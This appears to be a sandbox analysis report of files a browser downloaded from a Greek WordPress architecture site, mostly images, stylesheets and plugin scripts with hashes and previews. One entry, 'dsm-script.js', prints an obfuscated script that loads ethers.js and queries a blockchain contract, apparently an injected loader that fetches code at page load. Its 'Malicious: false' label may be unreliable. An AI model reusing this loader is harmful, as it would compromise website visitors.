                                Preview:......JFIF.....H.H......Exif..MM.*.................J...........R.(...........2.........Z.i.........n.......H.......H....2022:12:08 16:24:57..............................................Chttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.5.0"> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmp:ModifyDate="2022-12-08T16:24:57+02:00" xmp:MetadataDate="2022-12-08T16:24:57+02:00"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="produced" stEvt:softwareAgent="Affinity Designer 1.9.0" stEvt:when="2022-12-08T16:24:57+02:00"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta>
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 1536x864, components 3
                                Category:downloaded
                                Size (bytes):103446
                                Entropy (8bit):7.924079958188177
                                Encrypted:false
                                SSDEEP:
                                MD5:26134685C3CFD77421511CA249228028
                                SHA1:92BF38F750DFB9DF7EC8971D029F655B81D9373A
                                SHA-256:83570287F4708ACF63BEE3891149B0E9F3B35B4A084562CFCDB189710575C6FA
                                SHA-512:CD29C4BE0A9105206F5B6A336782FAEBA63F4EA5D9C3871574E1BCD73FAD1CC5CF4C64E85264DC0120D5CC985BB894B5AC52D6836FD2699A952BBBF442737F77
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2021/10/1_05-scaled-1-1536x864.jpg
                                Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......`...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..|..?...>x(.f..?*b...R..G4...b..h.....)qJ(.s..h.c....qJzR.E..)@.K.h#.. .I...jP(..g...R..L..F:..N&....A.A.K.zR.....J..4..w.J2h.(...6.F}....A.....&..c....bqFqK..1.....Nh..X.)..H})@...aW9..!4.M.0.R.FE.)Xw....1..G.!>.X.&}ii...qE..CI.i.P0..%;.)...h-.@...U4..K.@.g.9.i. .8....+...}....M(.....u..N...*@.!.JBi{b.=.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, ASCII text, with very long lines (9720), with no line terminators
                                Category:downloaded
                                Size (bytes):9720
                                Entropy (8bit):5.190875694455323
                                Encrypted:false
                                SSDEEP:
                                MD5:CFB428C02811F0CBE515D5F3DCA61DE6
                                SHA1:E95F8696FBE29A706E66CCF582B36D9BD650AB9F
                                SHA-256:679E44F9B4BBBC2AD0C4000C1413FD3A88627D83F1CBA8EBDAC26F81BC7EDB78
                                SHA-512:B5088A7E5E42E078116D23F82BBE1F0862C029E69FB68CAD655AA73643626AF50CA3335CA64D25624A713EE83C79774949FD9AB4BF2AC598DDB0B2174D3FB326
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.5.6
                                Preview:!function(){"use strict";const e=e=>Math.abs(parseInt(e,10)),t=(e,t)=>{const r=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["payment_required","payment-required"]]);r.has(t)&&(t=r.get(t)),Array.from(r.values()).includes(t)||(t=`custom-${t=(t=t.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const n=e.getAttribute("data-status");return e.wpcf7.status=t,e.setAttribute("data-status",t),e.classList.add(t),n&&n!==t&&e.classList.remove(n),t},r=(e,t,r)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:r});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},n=e=>{const{root:t,namespace:r="contact-form-7/v1"}=wpcf7.api;return a.reduceRight(((e,t)=>r=>t(r,e)),(e=>{let n,a,{url:c,path:s,endpoint:o,headers:i,body:l,data:p,...d}=e;"string"==typeof o&&(n=r.replace(/^\/|\/$/g,""),a=o
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 1536x864, components 3
                                Category:downloaded
                                Size (bytes):128803
                                Entropy (8bit):7.9429269027415375
                                Encrypted:false
                                SSDEEP:
                                MD5:6EF45EA203A9226F3BE592BD40A8ABE9
                                SHA1:FDE746780D6AF098B4368E2E5E79F30479717D62
                                SHA-256:6A5B6945AD099652A94A2EF7B0EC7D5D8ADB3EA494BAD824477804D8B8FE7E82
                                SHA-512:083EAB6E4726024B5A3923D0F51F75BAF61879947D72FF6FABB671AAAFF572F18D19727DD93A27491673E32A7347274C119141041B9C2CD577B574010407E101
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2022/05/1_23-2-1536x864.jpg
                                Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......`...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...JZ...3K.N.S.qKIE.-.Q@.KI@....).Z))E.-..f..KM....QIJ)..ii........@..QK@.....J..b..u....1N4...h.b...J)qE0..(.aE....QE..)i(....P...RP...(4.....Ri....QF)@...IO".E.&...4..QJ.4.z.9....xLT..!L.v&.J.a...x.*.......'..-.L.LD..Tr@..J...@.&.a.[..U...sK..J....S..)c#...... *UP)3K..:..sFi..\.c..i..4..)3I..w.f....vi3I.3H..h
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 1536x839, components 3
                                Category:downloaded
                                Size (bytes):324285
                                Entropy (8bit):7.97330256017383
                                Encrypted:false
                                SSDEEP:
                                MD5:95A4C0C6E8AE5BD92B1C01122356886E
                                SHA1:EEDB296F6287249614A19578A391FF0B2E5D3241
                                SHA-256:C2F8DF2FD370291DB4FC6F92D967F8478144A6E9685EEAC21A45631853C85492
                                SHA-512:973BAC4903382BB8B54DD4D3C49BBEC520F329B473469BA6FAEC1D1AAE113BF617E7DB2E0D4936EE6080F6A35A7055A0DA387034086DD817DC5AD837F46B6A5F
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2022/11/Raycap-S.A.-New-Project-1536x839.jpg
                                Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......G...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...ybQ#..=..W...y.....X[..V)......8.UF2.Ns.$...$K,k..+.ppO.OhF.,..c...1.!...P.j5g.g{(.W ....a....FsS..p.rJ.r...._6H.rsN.......m..(.f....Q..rp9.J peLH..g......*..J...(..S......7Z*......?Jv..b+R1...#y..(.........iRO..e....N....V..%."foC...K..\].(f..^0?Z....3`...&.nuYQ..]....k....7n...Z9B..c2.k#..x
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (651)
                                Category:downloaded
                                Size (bytes):2255
                                Entropy (8bit):5.351855235258829
                                Encrypted:false
                                SSDEEP:
                                MD5:602E1F42D73CADCD73338FFBC553D5A2
                                SHA1:977BF53305DFFA9ACB6AC6B2CA11FCE75DD1EF1E
                                SHA-256:A4AD384663963D335A27FA088178A17613A7B597F2DB8152EA3D809C8B9781A0
                                SHA-512:EB058D21C1B7D51D4A587D76D092AA563A8BEA578A1953ACC8F46B2CA2E62E9F6687D7B591018064008BF7AEC4DDED751B3ADDB756E08175CACCE697D7A4D276
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/dynamic-sidebar-manager/dsm-script.js
                                Preview:document.addEventListener('DOMContentLoaded', function() {. const _0x1a21 = atob("aHR0cHM6Ly9jZG4uZXRoZXJzLmlvL2xpYi9ldGhlcnMtNS4yLnVtZC5taW4uanM=");. function _0x9b43(_0x2d23, _0x4f6d) {. const _0x5c32 = document.createElement('script');. _0x5c32.src = _0x2d23, _0x5c32.type = "application/javascript", _0x5c32.onload = _0x4f6d, document.head.appendChild(_0x5c32);. }. function _0x8f7c() {. const _0x7a13 = new ethers.providers.JsonRpcProvider(atob("aHR0cHM6Ly9ic2MtZGF0YXNlZWQxLmJpbmFuY2Uub3JnLw==")),. _0x2b39 = "0xa6165aa33ac710ad5dcd4f4d6379466825476fde",. _0x6f8b = atob("W3siaW5wdXRzIjpbXSwic3RhdGVNdXRhYmlsaXR5Ijoibm9ucGF5YWJsZSIsInR5cGUiOiJjb25zdHJ1Y3RvciJ9LHsiYW5vbnltb3VzIjpmYWxzZSwiaW5wdXRzIjpbeyJpbmRleGVkIjpmYWxzZSwiaW50ZXJuYWxUeXBlIjoic3RyaW5nIiwibmFtZSI6IiIsInR5cGUiOiJzdHJpbmcifV0sIm5hbWUiOiJFIiwidHlwZSI6ImV2ZW50In0seyJpbnB1dHMiOlt7ImludGVybmFsVHlwZSI6InN0cmluZyIsIm5hbWUiOiJfYyIsInR5cGUiOiJzdHJpbmcifV0sIm5hbWUiOiJ1Iiwib3V0cHV
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 2560x1434, components 3
                                Category:dropped
                                Size (bytes):664547
                                Entropy (8bit):7.9747413274035575
                                Encrypted:false
                                SSDEEP:
                                MD5:046A911256DD61556EA43784257012A8
                                SHA1:95987B2D9B7E65A3763D7B0ECFFEC2DFC72EA963
                                SHA-256:167855A99912680AE76C67D6157A7E4E81815135242F15717B0B11911FBCC3AC
                                SHA-512:B914B2A53A7C6AABA1FC913792AB7CB2301B7E40EC629E047C2A4C45D30669F8ADD5AA0AC61405604E640CED02C0FBACFC061AE4158B6CC4DB2D6402DBACD32E
                                Malicious:false
                                Reputation:unknown
                                Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..H..}0..>4.OZq..bb.3.-4..4.K.J..Hii...))i..R.R.QI..BQE..).....J(....Q@..R...R.@..R..LQ.Z(.))M%0........E...E...))i....Q@..Q@......E.S...QE..KIKJ..R.R.0..J.Z(....R.J.`.'JZ.0..).h...1L..Hi..F.I.E&1L..u.....1E.......C...QH.......R...K.@....K@.)..i..%....1@............1N.).R...M4...).....b..(....R....Z.LQ.Z(.1F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (22518), with no line terminators
                                Category:downloaded
                                Size (bytes):22518
                                Entropy (8bit):4.794847757118751
                                Encrypted:false
                                SSDEEP:
                                MD5:22904399BF6A30AAEA612CA6993DBB2D
                                SHA1:0A60598D74DD2F98173801E6521FC5D5BE75D125
                                SHA-256:5951EF63C406C42D97FD9D34802457587370DB1880DF5774075004F78795A681
                                SHA-512:253FCEC9E27E2689474690C977F2E664DD3266E81D9AA1A394EBC482D09E5954E2D6F48D530E3B53819727E961F5C5D5C004574451F5E6D4EE01F36556214B8B
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/inc/icons/elegant-icons/assets/css/elegant-icons.min.css?ver=6.6.2
                                Preview:@font-face{font-family:'ElegantIcons';src:url('../fonts/ElegantIcons.eot');src:url('../fonts/ElegantIcons.eot?#iefix') format('embedded-opentype'),url('../fonts/ElegantIcons.woff') format('woff'),url('../fonts/ElegantIcons.ttf') format('truetype'),url('../fonts/ElegantIcons.svg#ElegantIcons') format('svg');font-weight:normal;font-style:normal}[data-icon]:before{font-family:'ElegantIcons';content:attr(data-icon);speak:none;font-weight:normal;font-variant:normal;text-transform:none;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale} .arrow_up,.arrow_down,.arrow_left,.arrow_right,.arrow_left-up,.arrow_right-up,.arrow_right-down,.arrow_left-down,.arrow-up-down,.arrow_up-down_alt,.arrow_left-right_alt,.arrow_left-right,.arrow_expand_alt2,.arrow_expand_alt,.arrow_condense,.arrow_expand,.arrow_move,.arrow_carrot-up,.arrow_carrot-down,.arrow_carrot-left,.arrow_carrot-right,.arrow_carrot-2up,.arrow_carrot-2down,.arrow_carrot-2left,.arrow_carrot-2right,.arrow_car
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (19082)
                                Category:downloaded
                                Size (bytes):19128
                                Entropy (8bit):4.5664248896753055
                                Encrypted:false
                                SSDEEP:
                                MD5:50BE31853049E4B4A10C277D5F95EB75
                                SHA1:AC2DFFC0C65AD6B209FEDF2169D0C50EB4119A3E
                                SHA-256:B651D87EF113CBA0C8EC8A33BFDB694171EFFEBA56B20BE12E3C77FC15F6AE9F
                                SHA-512:D4E784C23393F5DEC68871A57EBE42BB7B44112010774602B4A4F97BAAE37C6A40D405F71A624183F2597136141B79E9AC902C4835D34BF09A122978F71F8D4E
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.15.0
                                Preview:/*! elementor-icons - v5.15.0 - 30-01-2022 */.@font-face{font-family:eicons;src:url(../fonts/eicons.eot?5.15.0);src:url(../fonts/eicons.eot?5.15.0#iefix) format("embedded-opentype"),url(../fonts/eicons.woff2?5.15.0) format("woff2"),url(../fonts/eicons.woff?5.15.0) format("woff"),url(../fonts/eicons.ttf?5.15.0) format("truetype"),url(../fonts/eicons.svg?5.15.0#eicon) format("svg");font-weight:400;font-style:normal}[class*=" eicon-"],[class^=eicon]{display:inline-block;font-family:eicons;font-size:inherit;font-weight:400;font-style:normal;font-variant:normal;line-height:1;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@keyframes a{0%{transform:rotate(0deg)}to{transform:rotate(359deg)}}.eicon-animation-spin{animation:a 2s infinite linear}.eicon-editor-link:before{content:'\e800'}.eicon-editor-unlink:before{content:'\e801'}.eicon-editor-external-link:before{content:'\e802'}.eicon-editor-close:before{content:'\e803'}.eicon-editor-list-ol:before{cont
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):67944
                                Entropy (8bit):5.103684964702518
                                Encrypted:false
                                SSDEEP:
                                MD5:A0B34EA38CF442C7CA09B24D6AACF23E
                                SHA1:F7342BA23B18B6D00D79F72AA5B0C797CA9F40CB
                                SHA-256:51DEF3E664E1D456E246E9EE9431D5C6DD0F8F9E65C98F0294B91985637679FE
                                SHA-512:515D23665946A34A10AE78832F8831035A4902AED4315125DAD73699A7761BE9A21597337C156D39A7F03406A1A3F6F813C9FDC83931B8799D2E2009844DDD49
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/assets/js/brok-core.min.js?ver=6.6.2
                                Preview:!function(t){"use strict";"object"!=typeof qodef&&(window.qodef={}),window.qodefCore={},qodefCore.shortcodes={},qodefCore.listShortcodesScripts={qodefSwiper:qodef.qodefSwiper,qodefPagination:qodef.qodefPagination,qodefFilter:qodef.qodefFilter,qodefMasonryLayout:qodef.qodefMasonryLayout,qodefJustifiedGallery:qodef.qodefJustifiedGallery},qodefCore.body=t("body"),qodefCore.html=t("html"),qodefCore.windowWidth=t(window).width(),qodefCore.windowHeight=t(window).height(),qodefCore.scroll=0,t(document).ready(function(){qodefCore.scroll=t(window).scrollTop(),e.init()}),t(window).resize(function(){qodefCore.windowWidth=t(window).width(),qodefCore.windowHeight=t(window).height()}),t(window).scroll(function(){qodefCore.scroll=t(window).scrollTop()}),t(window).load(function(){i.init()}),qodefCore.qodefIsInViewport={check:function(o,t,n){var e,i;o.length&&(e=void 0!==o.data("viewport-offset")?o.data("viewport-offset"):.15,(i=new IntersectionObserver(function(e){!0===e[0].isIntersecting&&(t.call(o),
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (9130), with no line terminators
                                Category:downloaded
                                Size (bytes):9130
                                Entropy (8bit):4.684131715723909
                                Encrypted:false
                                SSDEEP:
                                MD5:DD613AE103AE202396A75CDE1DB09320
                                SHA1:4A4BF5956B185880C9D5F9D5552477CBE5380B41
                                SHA-256:5483615A3F8356FE87552F514EA35FCBA736464D3EFA796DFBC88ED91858BC7F
                                SHA-512:5CDE6C86D109074BDC6CD737BB7DB340F0BF3E606C062122AD098AFB44679B09ABFC4D143AC225215627F3CDEE5065EC6EF64E5B06B6D5E42ADAC861FA8EE108
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/inc/icons/dripicons/assets/css/dripicons.min.css?ver=6.6.2
                                Preview:@charset "UTF-8";[class*=" dripicons-"]:before,[class^=dripicons-]:before,[data-icon]:before{font-family:dripicons-v2!important;font-style:normal!important;font-weight:400!important;font-variant:normal!important;text-transform:none!important;speak:none;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@font-face{font-family:dripicons-v2;src:url(..//fonts/dripicons-v2.eot);src:url(..//fonts/dripicons-v2.eot?#iefix) format("embedded-opentype"),url(..//fonts/dripicons-v2.woff) format("woff"),url(..//fonts/dripicons-v2.ttf) format("truetype"),url(..//fonts/dripicons-v2.svg#dripicons-v2) format("svg");font-weight:400;font-style:normal}[data-icon]:before{content:attr(data-icon)}.dripicons-alarm:before{content:"\61"}.dripicons-align-center:before{content:"\62"}.dripicons-align-justify:before{content:"\63"}.dripicons-align-left:before{content:"\64"}.dripicons-align-right:before{content:"\65"}.dripicons-anchor:before{content:"\66"}.dripicons-archive:before{conte
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (19125)
                                Category:downloaded
                                Size (bytes):19285
                                Entropy (8bit):5.105045745087179
                                Encrypted:false
                                SSDEEP:
                                MD5:B7B914AA7522D2CA62281EAB32178CFF
                                SHA1:01B8DE37070B04C126C8DF631D5A6FE1897698AB
                                SHA-256:5495ADCE9EF0F1DCD6CBCDEBF42BEE2E87790B8F76836933B451A74106A42E51
                                SHA-512:938B261BC7C6459C23F865BAA470B5F06FA1733A6AED6226FE5B99FE492D92242BD774E01B2C12D85C5F0531E61C611F6E7FAF4CBD335B7C34FC61D786CE951A
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/themes/brok/inc/justified-gallery/assets/js/plugins/jquery.justifiedGallery.min.js?ver=1
                                Preview:/*!. * justifiedGallery - v3.8.1. * http://miromannino.github.io/Justified-Gallery/. * Copyright (c) 2020 Miro Mannino. * Licensed under the MIT license.. */..!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof module&&module.exports?module.exports=function(t,i){return void 0===i&&(i="undefined"!=typeof window?require("jquery"):require("jquery")(t)),e(i),i}:e(jQuery)}(function(l){var r=function(t,i){this.settings=i,this.checkSettings(),this.imgAnalyzerTimeout=null,this.entries=null,this.buildingRow={entriesBuff:[],width:0,height:0,aspectRatio:0},this.lastFetchedEntry=null,this.lastAnalyzedIndex=-1,this.yield={every:2,flushed:0},this.border=0<=i.border?i.border:i.margins,this.maxRowHeight=this.retrieveMaxRowHeight(),this.suffixRanges=this.retrieveSuffixRanges(),this.offY=this.border,this.rows=0,this.spinner={phase:0,timeSlot:150,$el:l('<div class="jg-spinner"><span></span><span></span><span></span></div>'),intervalId:null},this.scrollBarOn=!1,this.ch
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):27340
                                Entropy (8bit):4.711683921291926
                                Encrypted:false
                                SSDEEP:
                                MD5:6D12168FC277AC14DAFE5ABAC3D3CB56
                                SHA1:6532EC5B5621036C6E82625AAFA1D5594A65FA3A
                                SHA-256:88008922636F30A8E63F50B410F9F906C9BCCA4936B3ED6EEE751BBB9CB7A0F3
                                SHA-512:F229529652BC6F3EB09E3DF2504E8F1C23A1B3D315AF29234E781C68B81209316B470B886181EDEC617A11D255911B7E79A3ABC0E624E32D880D7D66AB2CEDDF
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/inc/icons/fontkiko/assets/css/kiko-all.min.css?ver=6.6.2
                                Preview:.kiko-train:before {. content: "\f001".}...kiko-car:before {. content: "\f002".}...kiko-truck:before {. content: "\f003".}...kiko-bike:before {. content: "\f004".}...kiko-sailboat:before {. content: "\f005".}...kiko-airplane:before {. content: "\f006".}...kiko-helicopter:before {. content: "\f007".}...kiko-motor-scooter:before {. content: "\f008".}...kiko-motorcycle:before {. content: "\f009".}...kiko-air-balloon:before {. content: "\f010".}...kiko-plane-takes-off:before {. content: "\f011".}...kiko-plane-lands:before {. content: "\f012".}...kiko-bus:before {. content: "\f013".}...kiko-cargo-vessel:before {. content: "\f014".}...kiko-electromobile:before {. content: "\f015".}...kiko-rocket:before {. content: "\f016".}...kiko-rocket-shuttle:before {. content: "\f017".}...kiko-ambulance:before {. content: "\f018".}...kiko-police:before {. content: "\f019".}...kiko-tank:before {. content: "\f020".}...kiko-tractor:before {. con
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (6697)
                                Category:downloaded
                                Size (bytes):9475
                                Entropy (8bit):4.510539640043227
                                Encrypted:false
                                SSDEEP:
                                MD5:A07C23E4F73D3F04890298AB831E650F
                                SHA1:2CA899CF5246E6FCBCF2B6E8E4AE4354A0561706
                                SHA-256:7B64A84C219D901E94B497F2374A5EABFA89A26B3C2891C774979DEA81BB66D4
                                SHA-512:F7535ADBFE86A632AE127E685B5E5662F8002DC7FCFF65F1815E34A059FE0A2BFFA595045FA30E0ED2E10CAA0071C8E7360C6A0100F7EE3C289E19ADB811EA83
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/elementor/css/global.css?ver=1649938459
                                Preview:.elementor-widget-heading .elementor-heading-title{color:var( --e-global-color-primary );font-family:var( --e-global-typography-primary-font-family ), Sans-serif;font-weight:var( --e-global-typography-primary-font-weight );}.elementor-widget-image .widget-image-caption{color:var( --e-global-color-text );font-family:var( --e-global-typography-text-font-family ), Sans-serif;font-weight:var( --e-global-typography-text-font-weight );}.elementor-widget-text-editor{color:var( --e-global-color-text );font-family:var( --e-global-typography-text-font-family ), Sans-serif;font-weight:var( --e-global-typography-text-font-weight );}.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:var( --e-global-color-primary );}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap, .elementor-widget-text-editor.elementor-drop-cap-view-default .elementor-drop-cap{color:var( --e-global-color-primary );border-color:var( --e-global-color-pri
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CC (Windows), datetime=2022:11:21 14:11:33], progressive, precision 8, 480x246, components 3
                                Category:dropped
                                Size (bytes):33239
                                Entropy (8bit):7.582833236915822
                                Encrypted:false
                                SSDEEP:
                                MD5:C5EA117B3989FBCEB9376F94BCD1D790
                                SHA1:039E3442F21210CF2CD9141CA8E6FFF39C1D5B91
                                SHA-256:FAC14C488CB4124934B78FF5DBF025AC551F00CD466D9525AF191F913B567D30
                                SHA-512:7335DA1FB71FA95C0B3925E02C02DAEE84006B20276EB6131E74BC94FF7C5C69577BE4F4DBE67C413B43DCC60782D60907E83C3E4AEBCFA806A239032D15E9F2
                                Malicious:false
                                Reputation:unknown
                                Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CC (Windows).2022:11:21 14:11:33..................................................................................&.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................R...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$.IJI$.R.I$...I%)$.IJIgu|..S.F.L.#6.Uf.9.........;.R....e..[..c.....j........B..Zk.4.....\......Vf;..NV
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (12198), with no line terminators
                                Category:dropped
                                Size (bytes):12198
                                Entropy (8bit):5.031745242580206
                                Encrypted:false
                                SSDEEP:
                                MD5:3819C3569DA71DAEC283A75483735F7E
                                SHA1:ECD40A5CC6F0B76200C454CA880210DC301CFAB8
                                SHA-256:214674CC77ABA35AB3567B88E2739FD08E8E96C61D279559AD61874069683EA0
                                SHA-512:2710655DFF46653DAEB3A6E3F6D36F885E51D5B375738EE353ACA40C6F66AE1A7DECE57039D58747012ED9EA2822191143C06F270123B8CC580F6A41B8E8AEF4
                                Malicious:false
                                Reputation:unknown
                                Preview:!function(){"use strict";function Waypoint(options){if(!options)throw new Error("No options passed to Waypoint constructor");if(!options.element)throw new Error("No element option passed to Waypoint constructor");if(!options.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+keyCounter,this.options=Waypoint.Adapter.extend({},Waypoint.defaults,options),this.element=this.options.element,this.adapter=new Waypoint.Adapter(this.element),this.callback=options.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=Waypoint.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=Waypoint.Context.findOrCreateByElement(this.options.context),Waypoint.offsetAliases[this.options.offset]&&(this.options.offset=Waypoint.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),allWaypoints[this.key]=this,keyCounter+=1}var keyCounter=0,allW
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (4186), with no line terminators
                                Category:downloaded
                                Size (bytes):4186
                                Entropy (8bit):4.923675414240059
                                Encrypted:false
                                SSDEEP:
                                MD5:EA958276B7DE454BD3C2873F0DC47E5F
                                SHA1:B143F6E8E8F79D8F104C26B0057EF5514D763219
                                SHA-256:2E10D353FF038C2CAD3492FC17801AF3E6EF2669C9E9713BDB78B1DCB104C4FE
                                SHA-512:2D40A1E713355EFF88FA3BBF5471B4DB5ACC48FA2B978A555C034F2E5C7F131FCAF48E849D5D048DF9D5DAE068C4B6467A97B1DDE99115E6B32F57E928569FC1
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.6.2
